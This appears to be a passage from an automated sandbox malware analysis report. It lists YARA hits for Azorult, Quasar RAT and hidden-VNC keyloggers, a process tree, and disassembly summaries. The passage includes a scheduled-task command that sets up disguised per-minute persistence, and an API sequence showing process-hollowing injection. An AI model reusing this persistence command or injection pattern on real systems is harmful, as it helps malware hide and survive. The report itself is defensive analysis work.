00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: vnc.exe PID: 6296 Parent PID: 7128

General

Start time:	01:36:03
Start date:	29/09/2021
Path:	C:\Users\user\AppData\Local\Temp\vnc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\vnc.exe'
Imagebase:	0xab0000
File size:	415232 bytes
MD5 hash:	B8BA87EE4C3FC085A2FED0D839AADCE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, Virustotal, Browse Detection: 93%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 5200 Parent PID: 6296

General

Start time:	01:36:04
Start date:	29/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: windef.exe PID: 5848 Parent PID: 7128

General

Start time:	01:36:04
Start date:	29/09/2021
Path:	C:\Users\user\AppData\Local\Temp\windef.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\windef.exe'
Imagebase:	0xf10000
File size:	357376 bytes
MD5 hash:	B4A202E03D4135484D0E730173ABCC72
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, Author: Joe Security Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 86%, Virustotal, Browse Detection: 93%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: CVbJSUXraQ.exe PID: 4112 Parent PID: 7128

General

Start time:	01:36:05
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\CVbJSUXraQ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\CVbJSUXraQ.exe
Imagebase:	0xdb0000
File size:	2111264 bytes
MD5 hash:	B0B78DA613422BE0DE8DE2E2A2D0CE68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6836 Parent PID: 7128

General

Start time:	01:36:06
Start date:	29/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Imagebase:	0x2d0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6084 Parent PID: 6836

General

Start time:	01:36:07
Start date:	29/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SystemPropertiesPerformance.exe PID: 6424 Parent PID: 968

General

Start time:	01:36:08
Start date:	29/09/2021
Path:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Imagebase:	0xa40000
File size:	2111272 bytes
MD5 hash:	9423821A023FB02427783F6385871B3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: CVbJSUXraQ.exe PID: 7128 Parent PID: 1380 CVbJSUXraQ.exeCOMMON

Executed Functions

Function 00DB3B3A, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DB3B68
IsDebuggerPresent.KERNEL32 ref: 00DB3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00E752F8,00E752E0,?,?), ref: 00DB3BEB

Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06

Part of subcall function 00DC092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DB3C14,00E752F8,?,?,?), ref: 00DC096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00DB3C6F
MessageBoxA.USER32 ref: 00DED281
SetCurrentDirectoryW.KERNEL32(?,00E752F8,?,?,?), ref: 00DED2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E64260,00E752F8,?,?,?), ref: 00DED33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00DED346

Part of subcall function 00DB3A46: GetSysColorBrush.USER32(0000000F), ref: 00DB3A50
Part of subcall function 00DB3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00DB3A5F
Part of subcall function 00DB3A46: LoadIconW.USER32(00000063), ref: 00DB3A76
Part of subcall function 00DB3A46: LoadIconW.USER32(000000A4), ref: 00DB3A88
Part of subcall function 00DB3A46: LoadIconW.USER32(000000A2), ref: 00DB3A9A
Part of subcall function 00DB3A46: LoadImageW.USER32 ref: 00DB3AC0
Part of subcall function 00DB3A46: RegisterClassExW.USER32 ref: 00DB3B16

Part of subcall function 00DB39D5: CreateWindowExW.USER32 ref: 00DB3A03
Part of subcall function 00DB39D5: CreateWindowExW.USER32 ref: 00DB3A24
Part of subcall function 00DB39D5: ShowWindow.USER32(00000000), ref: 00DB3A38
Part of subcall function 00DB39D5: ShowWindow.USER32(00000000), ref: 00DB3A41

Part of subcall function 00DB434A: _memset.LIBCMT ref: 00DB4370
Part of subcall function 00DB434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DB4415

Strings

runas, xrefs: 00DED33A
This is a third-party compiled AutoIt script., xrefs: 00DED279
%, xrefs: 00DB3C44

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%
API String ID: 529118366-3343222573
Opcode ID: 65c767f46e6be678c46e3243f89a69f0680dd9d1fd59df803b81150856fe5ceb
Instruction ID: 2719d68b500ad6c7cae71ee3d84bcae323d8668fa6967fa3e7835234ba5aeddc
Opcode Fuzzy Hash: 65c767f46e6be678c46e3243f89a69f0680dd9d1fd59df803b81150856fe5ceb
Instruction Fuzzy Hash: 6E51E331D08289EEDB01EBB6DC0AEED7F75EB45740B144069F456B21B2CAB09649DB31

Uniqueness

Uniqueness Score: -1.00%

Function 037F00BE, Relevance: 18.4, APIs: 12, Instructions: 393threadinjectionmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 037F02E7
GetThreadContext.KERNEL32(?,00010007), ref: 037F02FC
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 037F031C
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 037F034A
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 037F0367
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000), ref: 037F049B
VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 037F04B5
VirtualProtectEx.KERNEL32(?,?,?,00000001,?), ref: 037F051C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 037F053E
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 037F055D
SetThreadContext.KERNEL32(?,00010007), ref: 037F057E
ResumeThread.KERNEL32(?), ref: 037F058C

Memory Dump Source

Source File: 00000001.00000003.689660388.00000000037F0000.00000040.00000001.sdmp, Offset: 037F0000, based on PE: false

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID:
API String ID: 12256240-0
Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
Instruction ID: 7e4e6159c73cdfc6dc4f26da4ec4d9fb84ab68340e76a726c54e739fa7020137
Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
Instruction Fuzzy Hash: 0BF126B5D00219AFDB21CFA5C844BAEFBB9FF48300F1844A9EA55A7351D770AA94CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00DB49A0, Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?,?,00000000), ref: 00DB49CD

Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06

GetCurrentProcess.KERNEL32(?,00E3FAEC,00000000,00000000,?,?,00000000), ref: 00DB4A9A
IsWow64Process.KERNEL32(00000000,?,00000000), ref: 00DB4AA1
GetNativeSystemInfo.KERNEL32(00000000,?,00000000), ref: 00DB4AE7
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00DB4AF2
GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00DB4B23
GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00DB4B2F

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
